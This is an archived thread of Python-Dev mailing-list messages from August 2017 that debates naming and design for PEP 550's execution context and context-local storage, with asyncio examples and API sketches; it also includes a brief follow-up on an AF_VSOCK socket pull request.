> but instead put them in their own module? It feels analogous to the gc > module; all those functions could have gone in sys since they query and > affect the Python runtime system, but it makes more sense (and improves > the naming) to put them in their own module. It also segregates the > functionality so that sys doesn't become a catchall that overloads you > when you're reading through the sys module documentation. I myself am not a big fan of jamming all PEP 550 APIs into the sys module. We just need to come up with a good name. Yury From barry at python.org Thu Aug 24 10:38:42 2017 From: barry at python.org (Barry Warsaw) Date: Thu, 24 Aug 2017 10:38:42 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On Aug 24, 2017, at 10:23, Yury Selivanov wrote: > > On Thu, Aug 24, 2017 at 9:52 AM, Barry Warsaw wrote: >> Guido van Rossum wrote: >>> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >>> >>> I worry that that's going to lead more people astray thinking this has >>> something to do with contextlib, which it really doesn't (it's much more >>> closely related to threading.local()). >> >> This is my problem with using "Context" for this PEP. Although I can't >> keep up with all the names being thrown around, it seems to me that in >> Python we already have a well-established meaning for "contexts" -- >> context managers, and the protocols they implement as they participate >> in `with` statements. We have contextlib which reinforces this. What's >> being proposed in PEP 550 is so far removed from this concept that I >> think it's just going to cause confusion (well, it does in me anyway!). > > Although nobody refers to context managers as "context", they are > always called one of the following: "context manager", "CM", > "context manager protocol". PEP 550 just introduces a concept of > "context" that "context managers" will be able to manage. > >> >> To me, the functionality proposed in PEP 550 feels more like a "scope" >> than a "context". Unlike a lexical scope, it can't be inferred from the >> layout of the source code. It's more of a dynamic "execution scope" and >> the stacking of "local execution scopes" reinforces that for me. You >> use a key to find a value in the current execution scope, and it chains >> up until the key is found or you've reached the top of the local >> execution (defined as the thread start, etc.). > > Yes, what PEP 550 proposes can be seen as a new scoping mechanism. But > calling it a "scope" or "dynamic scope" would be a mistake (IMHO), as > Python scoping is already a complex topic (with locals, nonlocals, > globals, etc). > > Contrary to scoping, the programmer is much less likely to deal with > Execution Context. How often do we use "threading.local()"? Yes, but in conversations about Python, the term "context" (in the context of context managers) comes up way more often than the term "scope". I actually think Python's scoping rules are fairly easy to grasp, as there aren't that many levels or ways to access them, and the natural, common interactions are basically implicit when thinking about the code you're writing. So while "context", "environment", and "scope" are certainly overloaded terms in Python, the first two have very specific existing, commonplace constructs within Python, and "scope" is both the least overloaded of the three and most closely matches what is actually going on. A different tack would more closely align with PEP 550's heritage in thread-local storage, calling these things "execution storage".
I think I read Guido suggest elsewhere using a namespace here so that in common code you'd only have to change the "threading.local()" call to migrate to PEP 550. It might be neat if you could do something like:

    import execution
    els = execution.local()
    els.x = 1

By calling it "execution local storage" you're also providing a nicer cognitive bridge from "thread local storage", a concept anybody diving into this stuff will already understand pretty innately. No need to get fancy, we just think "Oh, I know what thread local storage is, and this seems related but slightly different, so now I basically understand what execution local storage is". Cheers, -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From p.f.moore at gmail.com Thu Aug 24 10:56:24 2017 From: p.f.moore at gmail.com (Paul Moore) Date: Thu, 24 Aug 2017 15:56:24 +0100 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On 24 August 2017 at 15:38, Barry Warsaw wrote: > Yes, but in conversations about Python, the term "context" (in the context of context managers) comes up way more often than the term "scope". I actually think Python's scoping rules are fairly easy to grasp, as there aren't that many levels or ways to access them, and the natural, common interactions are basically implicit when thinking about the code you're writing. > > So while "context", "environment", and "scope" are certainly overloaded terms in Python, the first two have very specific existing, commonplace constructs within Python, and "scope" is both the least overloaded of the three and most closely matches what is actually going on. > > A different tack would more closely align with PEP 550's heritage in thread-local storage, calling these things "execution storage". I think I read Guido suggest elsewhere using a namespace here so that in common code you'd only have to change the "threading.local()" call to migrate to PEP 550. It might be neat if you could do something like: I strongly agree with Barry's reservations about using the term "context" here. I've not been following the discussion (I was away when it started and there's too many emails to go through to catch up) but I've found the use of the term "context" to be a particular problem in trying to understand what's going on just skimming the messages. I don't have a strong opinion on what name should be used, but I am definitely against using the term "context". Paul From guido at python.org Thu Aug 24 11:00:04 2017 From: guido at python.org (Guido van Rossum) Date: Thu, 24 Aug 2017 08:00:04 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> <599E0610.7090508@stoneleaf.us> Message-ID: It shouldn't be called a namespace unless the dominant access is via attributes. On Thu, Aug 24, 2017 at 4:37 AM, Nick Coghlan wrote: > On 24 August 2017 at 08:47, Ethan Furman wrote: > > > > ContextVars is actually a different name for LogicalContext. So it would > > be: > >
> > ExecutionContext = [ContextVars()[, ContextVars()[ ...]]]
> >
> > and you get the (threading.local-like) ContextVars by
> >
> > context_vars = sys.get_context_vars()  # or whatever
> > context_vars.verbose = ...
>
> Migrating a (variant of a) naming subthread from python-ideas over to here, does the following sound plausible to anyone else?:
>
> ContextLocal - read/write access API (via get()/set() methods)
> ContextLocalNamespace - active mapping that CL.get()/set() manipulates
> ExecutionContext - current stack of context local namespaces
>
> Building a threading.local() style helper API would then look something like:
>
>     class ContextLocals:
>         def __init__(self, key_prefix):
>             # assign via __dict__ so we don't trigger our own __setattr__
>             self.__dict__['_key_prefix'] = key_prefix
>
>         def __getattr__(self, attr):
>             debugging_name = "{}.{}".format(self._key_prefix, attr)
>             self.__dict__[attr] = new_local = sys.new_context_local(debugging_name)
>             return new_local
>
>         def __setattr__(self, attr, value):
>             getattr(self, attr).set(value)
>
>         def __delattr__(self, attr):
>             getattr(self, attr).set(None)
>
>     my_state = ContextLocals(__name__)
>
> Cheers, > Nick. > > -- > Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > guido%40python.org > -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Thu Aug 24 11:02:55 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Thu, 24 Aug 2017 11:02:55 -0400 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 10:05 AM, Jim J. Jewett wrote: > On Thu, Aug 24, 2017 at 1:12 AM, Yury Selivanov wrote: > On Thu, Aug 24, 2017 > at 12:32 AM, Jim J. Jewett wrote: > >> The key requirement for using immutable datastructures is to make >> the "get_execution_context" operation fast. > > Do you really need the whole execution context, or do you just need > the current value of a specific key? (Or, sometimes, the writable > portion of the context.) We really need a snapshot of all keys/values. If we have the following "chain":

    EC = [{'a': 'b'}, {'spam': 'ham'}, {}, {'a': 'foo', 'num': 42}]

we need sys.get_execution_context() to return this:

    {'spam': 'ham', 'a': 'foo', 'num': 42}

To do this with a chain map and mutable maps, you need to traverse the whole chain and merge all dicts -- this is very expensive. Immutable datastructures make it possible to avoid the merge and traversal (in most cases), so the operation becomes cheap. Don't forget that the EC is a *dynamic* stack -- a generator starts, it pushes its LogicalContext, etc. Without a way to get a full "snapshot" of the EC we can't support asynchronous tasks. Look at this small example:

    foo = new_context_key()

    async def nested():
        await asyncio.sleep(1)
        print(foo.get())

    async def outer():
        foo.set(1)
        await nested()
        foo.set(1000)

    l = asyncio.get_event_loop()
    l.create_task(outer())
    l.run_forever()

It will print "1", as the "nested()" coroutine will see the "foo" key when it's awaited. Now let's say we want to refactor this snippet and run the "nested()" coroutine with a timeout:

    foo = new_context_key()

    async def nested():
        await asyncio.sleep(1)
        print(foo.get())

    async def outer():
        foo.set(1)
        await asyncio.wait_for(nested(), 10)  # !!!
        foo.set(1000)

    l = asyncio.get_event_loop()
    l.create_task(outer())
    l.run_forever()

So we wrap our `nested()` in a `wait_for()`, which creates a new asynchronous task to run `nested()`.
That task will now execute on its own, separately from the task that runs `outer()`. So we need to somehow capture the full EC at the moment `wait_for()` was called, and use that EC to run `nested()` within it. If we don't do this, the refactored code would print "1000" instead of "1". If the asynchronous-tasks topic is not enough: suppose you want to write a wrapper on top of concurrent.futures.ThreadPoolExecutor to offload some calculation to a threadpool. If you can "snapshot" the EC, you can do it: when you schedule a job, the EC is captured, and it is guaranteed that it will not be mutated before the job is executed. And it's also guaranteed that the job will not randomly mutate the EC of the code that scheduled it. >> Currently, the PEP doesn't do >> a good job at explaining why we need that operation and why it will be >> used by asyncio.Task and call_soon, so I understand the confusion. > > OK, the schedulers need the whole context, but if implemented as a > ChainMap (instead of per-key), I think you are a bit confused here (or I don't follow you) with the "per-key" ContextKey design. With ContextKeys:

    key = new_context_key('spam')
    key.set('a')
    # EC = [..., {key: 'a'}]

without:

    ec.set('key', 'a')
    # EC = [..., {'key': 'a'}]

ContextKey is an extra indirection layer that allows for granular caching and avoids name clashes. > isn't that just a single constant? As > in, don't they always schedule to the same thread? And when they need > another map, isn't that because the required context is already > available from whichever code requested the scheduling? > >>> (A) How many values do you expect a typical generator to use? The >>> Django survey suggested mostly 0, sometimes 1, occasionally 2. So >>> caching the values of all possible keys probably won't pay off. > >> Not many, but caching is still just as important, because some API users >> want the "get()" operation to be as fast as possible under all >> conditions. > > Sure, but only because they view it as a hot path; if the cost of that > speedup is slowing down another hot path, like scheduling the > generator in the first place, it may not be worth it. > > According to the PEP timings, HAMT doesn't beat a copy-on-write dict > until over 100 items, and never beats a regular dict. That suggests > to me that it won't actually help the overall speed for a typical (as > opposed to worst-case) process. It's a bit more complicated, unfortunately. The "100 items" figure is true when we can just memcpy all keys/values of the dict when we want to clone it. I've proposed a patch to do that, and it works. The old implementation of "dict.copy()" created a new dict, iterated over items of the old dict, and inserted them into the new one. This is 5x slower than memcpy. The subtle difference is that the memcpy implementation does not resize the dict. The resize is needed when we delete items from it (which will happen with the EC). I've updated the chart to show what happens when we implement an immutable dict with the current dict.copy() semantics: https://github.com/python/peps/blob/master/pep-0550-hamt_vs_dict.png The fundamental problem, though, is that the EC is hidden from the user. Suppose you have a huge application (let's say a new YouTube) that uses a multitude of libraries. You can then be in a situation where some of those libraries use the EC, and you actually have 100s of items in it. Now at least one LC in the chain is big, and its copying becomes expensive.
You start to experience overhead -- sometimes setting a variable to the EC is expensive, sometimes capturing the context takes longer, etc. HAMT guarantees that immutable dicts will have O(log N) performance for set() and merge (we will need to merge long chains from time to time, btw). This means that it's a future-proof solution that works in all edge cases. >>> And, of course, using a ChainMap means that the keys do NOT have to be >>> predefined ... so the Key class really can be skipped. >> The first version of the PEP had no ContextKey object and the most >> popular complaint about it was that the key names will clash. > That is true of any global registry. Thus the use of keys with > prefixes like com.sun. Such prefixes aren't considered Pythonic though. In the end, ContextKey is needed to give us an O(1) get() operation (because of caching). This is a hard requirement, otherwise we can't migrate libraries like decimal to use this new API. > The only thing pre-declaring a ContextKey buys in terms of clashes is > that a sophisticated scheduler would have less difficulty figuring out > which clashes will cause thrashing in the cache. I don't understand what you mean by "sophisticated scheduler". > Or are you suggesting that the key can only be declared once (as > opposed to once per piece of code), so that the second framework to > use the same name will see a RuntimeError? ContextKey is declared once for the code that uses it. Nobody else will use that key. Keys have names only for introspection purposes; the implementation doesn't use them, iow:

    var = new_context_key('aaaaaa')
    var.set(1)
    # EC = [..., {var: 1}]
    # Note that the EC has the "var" object itself as the key in the mapping, not "aaaaaa".

Yury
I've updated the chart to show what happens when we implement immutable dict with the current dict.copy() semantics: https://github.com/python/peps/blob/master/pep-0550-hamt_vs_dict.png The fundamental problem, though, is that the EC is hidden from the user. Suppose you have a huge application (let's say a new YouTube) that uses a multitude of libraries. You can then be in a situation where some of those libraries use the EC, and you actually have 100s of items in it. Now at least one LC in the chain is big, and its copying becomes expensive. You start to experience overhead -- sometimes setting a variable in the EC is expensive, sometimes capturing the context takes longer, etc. HAMT guarantees that immutable dicts will have O(log N) performance for set() and merge (we will need to merge long chains from time to time, btw). This means that it's a future-proof solution that works in all edge cases. > >>> And, of course, using a ChainMap means that the keys do NOT have to be >>> predefined ... so the Key class really can be skipped. > >> The first version of the PEP had no ContextKey object and the most >> popular complaint about it was that the key names will clash. > > That is true of any global registry. Thus the use of keys with > prefixes like com.sun. Such prefixes aren't considered Pythonic, though. In the end, ContextKey is needed to give us an O(1) get() operation (because of caching). This is a hard requirement; otherwise we can't migrate libraries like decimal to use this new API. > > The only thing pre-declaring a ContextKey buys in terms of clashes is > that a sophisticated scheduler would have less difficulty figuring out > which clashes will cause thrashing in the cache. I don't understand what you mean by "sophisticated scheduler". > > Or are you suggesting that the key can only be declared once (as > opposed to once per piece of code), so that the second framework to > use the same name will see a RuntimeError? ContextKey is declared once for the code that uses it. Nobody else will use that key. Keys have names only for introspection purposes; the implementation doesn't use them, iow:

    var = new_context_key('aaaaaa')
    var.set(1)
    # EC = [..., {var: 1}]
    # Note that the EC has the "var" object itself as the key in the
    # mapping, not "aaaaaa".

Yury From yselivanov.ml at gmail.com Thu Aug 24 11:13:12 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Thu, 24 Aug 2017 11:13:12 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 10:38 AM, Barry Warsaw wrote: [..] I'll snip the naming discussion for now, I'm really curious to see what other people will say. > A different tack would more closely align with PEP 550's heritage in thread-local storage, calling these things "execution storage". I think I read Guido suggest elsewhere using a namespace here so that in common code you'd only have to change the "threading.local()" call to migrate to PEP 550. It might be neat if you could do something like:
>
>     import execution
>     els = execution.local()
>     els.x = 1

A couple of relevant updates on this topic in old python-ideas threads (I'm not sure you've seen them): https://mail.python.org/pipermail/python-ideas/2017-August/046888.html https://mail.python.org/pipermail/python-ideas/2017-August/046889.html Unfortunately it's not feasible to re-use the "local()" idea for PEP 550. The "local()" semantics imposes many constraints and complexities on the design, while offering only a "users already know it" argument for it.
And even if we had an "execution.local()" API, it would not be safe to always replace every "threading.local()" with it. Sometimes what you need is an actual TLS. Sometimes your design actually depends on it, even if you are not aware of that. Updating existing libraries to use PEP 550 should be a very conscious decision, simply because it has different semantics/guarantees. Y From ethan at stoneleaf.us Thu Aug 24 12:00:49 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Thu, 24 Aug 2017 09:00:49 -0700 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: <599EF831.6070306@stoneleaf.us> On 08/24/2017 06:52 AM, Barry Warsaw wrote: > To me, the functionality proposed in PEP 550 feels more like a "scope" > than a "context". Unlike a lexical scope, it can't be inferred from the > layout of the source code. It's more of a dynamic "execution scope" and > the stacking of "local execution scopes" reinforces that for me. You > use a key to find a value in the current execution scope, and it chains > up until the key is found or you've reached the top of the local > execution (defined as the thread start, etc.). Scope and dynamic certainly feel like the important concepts in PEP 550, and Guido (IIRC) has already said these functions do not belong in contextlib, so context may not be a good piece of the name. Some various ideas:

    - ExecutionScope, LocalScope
    - DynamicScope, ScopeLocals
    - DynamicExecutionScope, DynamicLocals
    - DynamicExecutionScope, ExecutionLocals
    - DynamicExecutionScope, ScopeLocals

-- ~Ethan~ From ericsnowcurrently at gmail.com Thu Aug 24 12:44:19 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Thu, 24 Aug 2017 10:44:19 -0600 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 7:52 AM, Barry Warsaw wrote: > Guido van Rossum wrote: >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> I worry that that's going to lead more people astray thinking this has >> something to do with contextlib, which it really doesn't (it's much more >> closely related to threading.local()). > > This is my problem with using "Context" for this PEP. Although I can't > keep up with all names being thrown around, it seems to me that in > Python we already have a well-established meaning for "contexts" -- > context managers, and the protocols they implement as they participate > in `with` statements. We have contextlib which reinforces this. What's > being proposed in PEP 550 is so far removed from this concept that I > think it's just going to cause confusion (well, it does in me anyway!). The precedent (and perhaps inspiration) here lies in decimal.context [1] and ssl.SSLContext [2]. email.Policy [3] qualifies in spirit, as does the import state [4]. Each encapsulates the state of some subsystem. They can be enabled in the current thread via a context manager. (Well, only the first two, but the latter two are strong candidates.) They are each specific to a *logical* execution context. Most notably, each is implicit global state in the current thread of execution. PEP 550, if I've understood right, is all about supporting these contexts in other logical threads of execution than just Python/OS threads (e.g. async, generators). Given all that, "context" is an understandable name to use here. Personally, I'm still on the fence on whether "context" fits in the name.
:) None of the proposed names have felt quite right thus far, which is probably why we're still talking about it! :) > > To me, the functionality proposed in PEP 550 feels more like a "scope" > than a "context". Unlike a lexical scope, it can't be inferred from the > layout of the source code. It's more of a dynamic "execution scope" and > the stacking of "local execution scopes" reinforces that for me. You > use a key to find a value in the current execution scope, and it chains > up until the key is found or you've reached the top of the local > execution (defined as the thread start, etc.). "scope" fits because it's all about chained lookup in implicit namespaces. However, to me the focus of PEP 550 is on the context (encapsulated state) more than the chaining. > > One other suggestion: maybe we shouldn't put these new functions in sys, > but instead put them in their own module? It feels analogous to the gc > module; all those functions could have gone in sys since they query and > effect the Python runtime system, but it makes more sense (and improves > the naming) by putting them in their own module. It also segregates the > functionality so that sys doesn't become a catchall that overloads you > when you're reading through the sys module documentation. +1 -eric

[1] https://docs.python.org/3/library/decimal.html#context-objects
[2] https://docs.python.org/3/library/ssl.html#ssl.SSLContext
[3] https://docs.python.org/3/library/email.policy.html
[4] https://www.python.org/dev/peps/pep-0406/

From ericsnowcurrently at gmail.com Thu Aug 24 12:55:05 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Thu, 24 Aug 2017 10:55:05 -0600 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 8:23 AM, Yury Selivanov wrote: > Contrary to scoping, the programmer is much less likely to deal with > Execution Context. How often do we use "threading.local()"? This is an important point. PEP 550 is targeting library authors, right? Most folks will not be interacting with the new functionality except perhaps indirectly via context managers. So I'm not convinced that naming collisions with more commonly used concepts is as much a concern, particularly because of conceptual similarity. However, if the functionality of the PEP would be used more commonly then the naming would be a stronger concern. -eric From cavery at redhat.com Thu Aug 24 13:45:36 2017 From: cavery at redhat.com (Cathy Avery) Date: Thu, 24 Aug 2017 13:45:36 -0400 Subject: [Python-Dev] python issue27584 AF_VSOCK support In-Reply-To: References: <59958A4F.30207@redhat.com> Message-ID: <599F10C0.6050903@redhat.com> On 08/17/2017 05:38 PM, Christian Heimes wrote: > On 2017-08-17 14:21, Cathy Avery wrote: >> Hi, >> >> I have a Python pull request https://github.com/python/cpython/pull/2489 >> that introduces AF_VSOCK to the Python C socket module. Unfortunately >> things have gone quiet for several weeks. Since I am new to this process >> I am unclear on what to expect as the next steps. I believe I have >> addressed all issues. If I am mistaken please let me know. A real >> functioning test setup is a bit painful and I would be happy to help in >> any way I can. The Microsoft Hyper-V team is now introducing support for >> vsock in the upstream Linux kernel, so its adoption is spreading amongst >> the various hypervisors. >> >> Any guidance on the basic timelines would be very helpful. > Hi Cathy, > > thanks for your contribution! Your patch looks mostly fine.
> I pointed out some minor issues in my review.
>
> Regards,
> Christian

Thanks! I'm going to push it soon. I think I got everything. From francismb at email.de Thu Aug 24 16:01:13 2017 From: francismb at email.de (francismb) Date: Thu, 24 Aug 2017 22:01:13 +0200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> Hi, On 08/24/2017 03:52 PM, Barry Warsaw wrote: > Guido van Rossum wrote: >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> I worry that that's going to lead more people astray thinking this has >> something to do with contextlib, which it really doesn't (it's much more >> closely related to threading.local()). > If it's hard to find a name due to collision with related meanings or already taken buckets then I would suggest just inventing a new word. An artificial one. What do you think? Thanks, --francis From barry at python.org Thu Aug 24 17:06:09 2017 From: barry at python.org (Barry Warsaw) Date: Thu, 24 Aug 2017 17:06:09 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> References: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> Message-ID: On Aug 24, 2017, at 16:01, francismb wrote: > On 08/24/2017 03:52 PM, Barry Warsaw wrote: >> Guido van Rossum wrote: >>> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >>> >>> I worry that that's going to lead more people astray thinking this has >>> something to do with contextlib, which it really doesn't (it's much more >>> closely related to threading.local()). >> > If it's hard to find a name due to collision with related meanings or > already taken buckets then I would suggest just inventing a new word. An > artificial one. > > What do you think? I propose RaymondLuxuryYach_t, but we'll have to pronounce it ThroatwobblerMangrove. import-dinsdale-ly y'rs, -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From solipsis at pitrou.net Thu Aug 24 17:32:21 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Thu, 24 Aug 2017 23:32:21 +0200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) References: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> Message-ID: <20170824233221.76ff8934@fsol> On Thu, 24 Aug 2017 17:06:09 -0400 Barry Warsaw wrote: > On Aug 24, 2017, at 16:01, francismb wrote: > > On 08/24/2017 03:52 PM, Barry Warsaw wrote: > >> Guido van Rossum wrote: > >>> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: > >>> > >>> I worry that that's going to lead more people astray thinking this has > >>> something to do with contextlib, which it really doesn't (it's much more > >>> closely related to threading.local()). > >> > > If it's hard to find a name due to collision with related meanings or > > already taken buckets then I would suggest just inventing a new word. An > > artificial one. > > > > What do you think? > > I propose RaymondLuxuryYach_t, but we'll have to pronounce it ThroatwobblerMangrove. Sorry, but I think we should pronounce it ThroatwobblerMangrove. Regards Antoine.
From ericsnowcurrently at gmail.com Thu Aug 24 18:47:20 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Thu, 24 Aug 2017 16:47:20 -0600 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> <599E0610.7090508@stoneleaf.us> Message-ID: On Thu, Aug 24, 2017 at 5:37 AM, Nick Coghlan wrote: > Migrating a (variant of a) naming subthread from python-ideas over to > here, does the following sound plausible to anyone else?: > > ContextLocal - read/write access API (via get()/set() methods) > ContextLocalNamespace - active mapping that CL.get()/set() manipulates > ExecutionContext - current stack of context local namespaces Overall it makes sense. The following derivative might be more clear:

    ContextLocal
    ContextLocals
    ChainedContextLocals (or some variation explicitly calling out the chaining)

Alternatively, similar to other suggestions:

    ContextVar
    ContextVars
    ChainedContextVars

I also think "state" helps disambiguate "context":

    ContextVar
    ContextState
    ChainedContextState

or:

    ContextVar
    ContextVars
    ContextState (perhaps a little too ambiguous without the explicit "chained")

-eric From greg.ewing at canterbury.ac.nz Thu Aug 24 19:34:48 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Fri, 25 Aug 2017 11:34:48 +1200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: <599F6298.6080704@canterbury.ac.nz> Barry Warsaw wrote: > This is my problem with using "Context" for this PEP. Although I can't > keep up with all names being thrown around, Not sure whether it helps, but a similar concept in some Scheme dialects is called a "fluid binding". e.g. Section 5.4 of http://www.scheme.com/csug8/binding.html It's not quite the same thing as we're talking about here (the names bound exist in the normal name lookup scope rather than a separate namespace) but maybe some of the terminology could be adapted. -- Greg From greg.ewing at canterbury.ac.nz Thu Aug 24 19:58:32 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Fri, 25 Aug 2017 11:58:32 +1200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: <599F6828.9020609@canterbury.ac.nz> Barry Warsaw wrote: > I actually > think Python's scoping rules are fairly easy to grasp, The problem is that the word "scope", as generally used in relation to programming languages, has to do with visibility of names. A variable is "in scope" at a particular point in the code if you can access it just by writing its name there. The things we're talking about are never "in scope" in that sense. What we have is something similar to a dynamic scope, but a special action is required to access bindings in it. I can't think of any established term for things like that. The closest I've seen is one dialect of Scheme that called it a "fluid environment". In that dialect, fluid-let didn't create bindings in the normal scope, and you had to use specific functions to access them.
-- Greg From ncoghlan at gmail.com Fri Aug 25 00:55:43 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Fri, 25 Aug 2017 14:55:43 +1000 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> <599E0610.7090508@stoneleaf.us> Message-ID: On 25 August 2017 at 01:00, Guido van Rossum wrote: > It shouldn't be called a namespace unless the dominant access is via > attributes. That makes sense. Since the main purpose of that part of the Python API is to offer an opaque handle to where the context locals store their values, something semantically neutral like "State" may work:

    - ContextLocal: read/write access API
    - ContextLocalState: where ContextLocal instances actually store things
    - ExecutionContext: nested stack of context local states

The attribute on generators and coroutines could then be called "__context_locals__", and that would either be None (indicating that any context local references will just use the already active context local storage), or else it would be set to a ContextLocalState instance (indicating that starting & stopping the operation will push & pop the given context local state). Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From guido at python.org Fri Aug 25 01:21:09 2017 From: guido at python.org (Guido van Rossum) Date: Thu, 24 Aug 2017 22:21:09 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> <599E0610.7090508@stoneleaf.us> Message-ID: I think we should let the naming issue go for now, while Yury et al. are rewriting the PEP. We'll revisit it after we're more comfortable with the semantics. On Thu, Aug 24, 2017 at 9:55 PM, Nick Coghlan wrote: > On 25 August 2017 at 01:00, Guido van Rossum wrote: > > It shouldn't be called a namespace unless the dominant access is via > > attributes. > > That makes sense. > > Since the main purpose of that part of the Python API is to offer an > opaque handle to where the context locals store their values, > something semantically neutral like "State" may work: > > - ContextLocal: read/write access API > - ContextLocalState: where ContextLocal instances actually store things > - ExecutionContext: nested stack of context local states > > The attribute on generators and coroutines could then be called > "__context_locals__", and that would either be None (indicating that > any context local references will just use the already active context > local storage), or else it would be set to a ContextLocalState > instance (indicating that starting & stopping the operation will push & > pop the given context local state). > > Cheers, > Nick. > > -- > Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia > -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From ncoghlan at gmail.com Fri Aug 25 01:36:55 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Fri, 25 Aug 2017 15:36:55 +1000 Subject: [Python-Dev] Scope, not context?
(was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On 24 August 2017 at 23:52, Barry Warsaw wrote: > Guido van Rossum wrote: >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> I worry that that's going to lead more people astray thinking this has >> something to do with contextlib, which it really doesn't (it's much more >> closely related to threading.local()). > > This is my problem with using "Context" for this PEP. Although I can't > keep up with all names being thrown around, it seems to me that in > Python we already have a well-established meaning for "contexts" -- > context managers, and the protocols they implement as they participate > in `with` statements. We have contextlib which reinforces this. What's > being proposed in PEP 550 is so far removed from this concept that I > think it's just going to cause confusion (well, it does in me anyway!). While I understand the concern, I think context locals and contextlib are more closely related than folks realise, as one of the main problems that the PEP is aiming to solve is that with statements (and hence context managers) *do not work as expected* when their body includes "yield", "yield from" or "await". The reason they don't work reliably is because in the absence of frame hacks, context managers are currently limited to manipulating process global and thread local state - there's no current notion of context local storage that interacts nicely with the frame suspension keywords. And hence in the absence of any support for context local state, any state changes made by context managers tend to remain in effect *even if the frame that entered the context manager gets suspended*. Context local state makes it possible to solve that problem, as it means that encountering one of the frame suspension keywords in the body of a with statement will implicitly revert all changes made to context local variables until such time as that particular frame is resumed, and you have to explicitly opt-in on a per-instance basis to instead allow those state changes to affect the calling context that's suspending & resuming the frame. That said, I can also see Guido's point that the proposed new APIs have a very different flavour to the existing APIs in contextlib, so it doesn't necessarily make sense to use that module directly. Building on the "context locals" naming scheme I've been discussing elsewhere, one possible name for a dedicated module would be "contextlocals" giving:

    # Read/write access to individual context locals
    * context_var = contextlocals.new_context_local(name: str='...')

    # Context local storage manipulation
    * context = contextlocals.new_context_local_state()
    * contextlocals.run_with_context_locals(context: ContextLocalState, func, *args, **kwargs)
    * __context_locals__ attribute on generators and coroutines

    # Overall execution context manipulation
    * current_ec = contextlocals.get_execution_context()
    * new_ec = contextlocals.new_execution_context()
    * contextlocals.run_with_execution_context(ec: ExecutionContext, func, *args, **kwargs)

